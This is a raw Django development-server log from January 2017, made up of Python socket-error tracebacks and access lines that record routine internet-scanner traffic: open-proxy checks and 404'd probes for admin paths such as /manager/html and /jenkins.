  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[14/Jan/2017 19:31:39] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[14/Jan/2017 19:41:14] "GET / HTTP/1.1" 404 2005
[14/Jan/2017 20:39:58] "GET / HTTP/1.1" 404 2004
[14/Jan/2017 21:35:08] "GET /manager/html HTTP/1.1" 404 2041
[14/Jan/2017 22:17:58] "GET / HTTP/1.1" 404 2005
[14/Jan/2017 22:36:58] "GET /blog/ HTTP/1.1" 200 5202
[14/Jan/2017 23:02:27] "GET /robots.txt HTTP/1.1" 404 2036
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[14/Jan/2017 23:02:27] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[14/Jan/2017 23:02:31] "GET / HTTP/1.1" 404 2006
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[14/Jan/2017 23:02:31] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[15/Jan/2017 00:50:53] "GET /manager/html HTTP/1.1" 404 2041
[15/Jan/2017 01:06:12] "GET http://www.baidu.com/?rands=_1066882222429633881481040 HTTP/1.0" 404 1685
[15/Jan/2017 01:06:13] "GET http://23.251.55.38/index.html?rands=_2280613382088639071159680 HTTP/1.0" 404 1711
[15/Jan/2017 01:09:01] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 116, in handle
    self.raw_requestline = self.rfile.readline()
  File "/usr/lib/python2.7/socket.py", line 447, in readline
    data = self._sock.recv(self._rbufsize)
error: [Errno 104] Connection reset by peer
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 116, in handle
    self.raw_requestline = self.rfile.readline()
  File "/usr/lib/python2.7/socket.py", line 447, in readline
    data = self._sock.recv(self._rbufsize)
error: [Errno 104] Connection reset by peer
[15/Jan/2017 04:48:26] "GET / HTTP/1.0" 404 2001
[15/Jan/2017 05:48:08] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 1715
[15/Jan/2017 06:10:59] "GET / HTTP/1.1" 404 2003
[15/Jan/2017 07:56:35] "GET /manager/html HTTP/1.1" 404 2041
[15/Jan/2017 08:01:30] "GET / HTTP/1.1" 404 2005
[15/Jan/2017 08:07:10] "GET http://www.ip.cn/?rands=_927109531816265703692748 HTTP/1.0" 404 1668
[15/Jan/2017 08:07:11] "GET http://m.sogou.com/?rands=_367286433632595124542864 HTTP/1.0" 404 1676
[15/Jan/2017 09:35:33] "GET /manager/html HTTP/1.1" 404 2041
[15/Jan/2017 10:01:58] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[15/Jan/2017 10:01:58] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[15/Jan/2017 10:01:58] "CONNECT www.google.com HTTP/1.1" 404 1636
[15/Jan/2017 10:01:59] "CONNECT www.baidu.com HTTP/1.1" 404 1632
[15/Jan/2017 10:01:59] "GET http://www.123cha.com HTTP/1.1" 404 1653
[15/Jan/2017 10:01:59] "GET http://www.boxun.com HTTP/1.1" 404 1649
[15/Jan/2017 10:10:30] "GET http://www.baidu.com/?rands=_1526070480811579405737392 HTTP/1.0" 404 1685
[15/Jan/2017 10:10:31] "GET http://23.251.55.38/index.html?rands=_4200124334618061562813216 HTTP/1.0" 404 1711
[15/Jan/2017 11:15:13] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[15/Jan/2017 12:37:17] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[15/Jan/2017 12:51:53] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[15/Jan/2017 15:40:58] "GET / HTTP/1.1" 404 2004
[15/Jan/2017 16:12:57] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[15/Jan/2017 17:05:06] "GET /manager/html HTTP/1.1" 404 2041
[15/Jan/2017 19:11:16] "GET http://www.baidu.com/?rands=_666413085011642404726592 HTTP/1.0" 404 1684
[15/Jan/2017 19:11:22] "GET http://23.251.55.38/index.html?rands=_232087188424011913979584 HTTP/1.0" 404 1710
[15/Jan/2017 20:37:24] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[15/Jan/2017 20:37:24] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[15/Jan/2017 21:20:44] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[15/Jan/2017 22:44:10] "GET /manager/html HTTP/1.1" 404 2041
[15/Jan/2017 23:01:57] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[16/Jan/2017 00:10:28] "GET / HTTP/1.0" 404 2001
[16/Jan/2017 02:55:52] "GET / HTTP/1.1" 404 2000
[16/Jan/2017 03:58:46] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[16/Jan/2017 03:58:46] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[16/Jan/2017 04:17:35] "GET http://www.baidu.com/?rands=_2588319360628750075847704 HTTP/1.0" 404 1685
[16/Jan/2017 04:17:35] "GET http://23.251.55.38/index.html?rands=_3865536769190801474376 HTTP/1.0" 404 1708
[16/Jan/2017 06:39:12] "GET / HTTP/1.0" 404 2001
[16/Jan/2017 06:47:26] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[16/Jan/2017 07:20:27] "GET / HTTP/1.1" 404 2005
[16/Jan/2017 07:20:39] "GET / HTTP/1.1" 404 2005
[16/Jan/2017 09:49:38] "GET / HTTP/1.1" 404 2000
[16/Jan/2017 09:56:01] "GET /manager/html HTTP/1.1" 404 2041
[16/Jan/2017 11:02:49] "GET / HTTP/1.1" 404 2004
[16/Jan/2017 11:08:23] "GET / HTTP/1.0" 404 2005
[16/Jan/2017 11:22:39] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[16/Jan/2017 13:10:18] "GET / HTTP/1.0" 404 2001
[16/Jan/2017 13:17:26] "GET http://www.baidu.com/?rands=_13685184161686118122646144 HTTP/1.0" 404 1686
[16/Jan/2017 13:17:26] "GET http://23.251.55.38/index.html?rands=_7904135270012960005864264 HTTP/1.0" 404 1711
[16/Jan/2017 14:50:01] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[16/Jan/2017 17:05:15] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[16/Jan/2017 17:13:04] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[16/Jan/2017 18:09:43] "GET / HTTP/1.1" 404 2005
[16/Jan/2017 22:11:19] "GET http://www.baidu.com/?rands=_810617931234904762089696 HTTP/1.0" 404 1684
[16/Jan/2017 22:11:22] "GET http://23.251.55.38/index.html?rands=_1332059607631533844082000 HTTP/1.0" 404 1711
[17/Jan/2017 00:58:09] "GET /manager/html HTTP/1.1" 404 2041
[17/Jan/2017 02:11:51] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[17/Jan/2017 02:21:29] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[17/Jan/2017 02:21:29] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[17/Jan/2017 02:29:48] "GET /manager/html HTTP/1.1" 404 2041
[17/Jan/2017 03:44:25] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[17/Jan/2017 04:02:55] "GET / HTTP/1.0" 404 2001
[17/Jan/2017 04:03:16] "GET / HTTP/1.1" 404 2005
[17/Jan/2017 04:03:18] "GET /www/start.html HTTP/1.1" 404 2047
[17/Jan/2017 04:03:18] "GET /RemoteControl.html HTTP/1.1" 404 2059
[17/Jan/2017 04:03:22] "GET /stats HTTP/1.1" 404 2015
[17/Jan/2017 04:03:22] "GET /jenkins HTTP/1.1" 404 2021
[17/Jan/2017 04:03:22] "GET /invoker/JMXInvokerServlet HTTP/1.1" 404 2075
[17/Jan/2017 04:40:56] code 400, message Bad request syntax ('\x16\x03\x01\x00\x8c\x01\x00\x00\x88\x03\x03d\x89\x9b\xe4\x1e<\xb67h\x0e\x0e\x96\xd2\xaa"\x13\x99\x04\x84[\xd1\x9d\xad\x85\x97\xe3\x9d\xc0\x8c\xbe\xa5^\x00\x00.\xc0+\xc0/\x00\x9e\x00\x9c\xc0')
Validating models...

0 errors found
January 12, 2017 - 09:01:07
Django version 1.6.1, using settings 'mysite.settings'
Starting development server at http://0.0.0.0:8080/
Quit the server with CONTROL-C.
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 55348)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 60989)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 61205)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 61590)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 64802)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 54975)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 57197)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 56709)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 59957)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 58708)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 51320)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.119.226.198', 53574)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 36255)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('141.8.142.178', 60270)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('141.8.142.178', 60522)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('130.193.50.33', 43620)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('141.8.142.77', 39532)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('93.158.152.21', 57747)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('104.152.52.70', 42074)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('104.152.52.70', 47784)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 39089)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 49891)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 50941)
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('91.236.75.4', 54525)
----------------------------------------
---------------------------------------Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0x8c in position 5: ordinal not in range(128)
[17/Jan/2017 04:40:56] "GET /recordings/ HTTP/1.1" 404 2038
[17/Jan/2017 05:45:11] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[17/Jan/2017 07:00:58] "GET http://www.baidu.com/?rands=_2280014203862113113101832 HTTP/1.0" 404 1685
[17/Jan/2017 07:00:59] "GET http://23.251.55.38/index.html?rands=_13716107521635147161777248 HTTP/1.0" 404 1712
[17/Jan/2017 08:38:34] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[17/Jan/2017 09:19:07] "GET /manager/html HTTP/1.1" 404 2041
[17/Jan/2017 10:11:00] "GET /manager/html HTTP/1.1" 404 2041
[17/Jan/2017 10:46:39] "GET /manager/html HTTP/1.1" 404 2041
[17/Jan/2017 10:52:29] "GET /manager/html HTTP/1.1" 404 2041
[17/Jan/2017 11:48:21] "GET / HTTP/1.1" 404 2003
[17/Jan/2017 11:50:54] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[17/Jan/2017 13:50:20] "GET /manager/html HTTP/1.1" 404 2041
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 116, in handle
    self.raw_requestline = self.rfile.readline()
  File "/usr/lib/python2.7/socket.py", line 447, in readline
    data = self._sock.recv(self._rbufsize)
error: [Errno 104] Connection reset by peer
[17/Jan/2017 14:41:12] "GET / HTTP/1.0" 404 2001
[17/Jan/2017 15:18:41] "GET http://www.izhongsai.com/show.html?t=1484666321099 HTTP/1.1" 404 1711
[17/Jan/2017 15:59:38] "GET http://www.baidu.com/?rands=_103059075842402808184368 HTTP/1.0" 404 1684
[17/Jan/2017 15:59:40] "GET http://23.251.55.38/index.html?rands=_471650617615971671360692 HTTP/1.0" 404 1710
[17/Jan/2017 16:01:02] "GET http://www.baidu.com/?rands=_660441473634070764874848 HTTP/1.0" 404 1684
[17/Jan/2017 16:01:03] "GET http://23.251.55.38/index.html?rands=_7146442263679202014296 HTTP/1.0" 404 1708
[17/Jan/2017 21:03:58] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[17/Jan/2017 21:27:14] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[17/Jan/2017 21:40:41] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[18/Jan/2017 00:43:20] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[18/Jan/2017 01:02:05] "GET http://www.baidu.com/?rands=_23037178431228882023797004 HTTP/1.0" 404 1686
[18/Jan/2017 01:02:05] "GET http://23.251.55.38/index.html?rands=_752067432012681903981184 HTTP/1.0" 404 1710
[18/Jan/2017 04:02:23] "GET /manager/html HTTP/1.1" 404 2041
[18/Jan/2017 06:13:53] "GET /robots.txt HTTP/1.1" 404 2036
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[18/Jan/2017 06:13:53] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[18/Jan/2017 06:13:57] "GET / HTTP/1.1" 404 2006
[18/Jan/2017 07:55:28] "GET /manager/html HTTP/1.1" 404 2041
[18/Jan/2017 08:13:07] "GET /robots.txt HTTP/1.1" 404 2040
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[18/Jan/2017 08:13:07] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[18/Jan/2017 08:13:11] "GET / HTTP/1.1" 404 2010
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
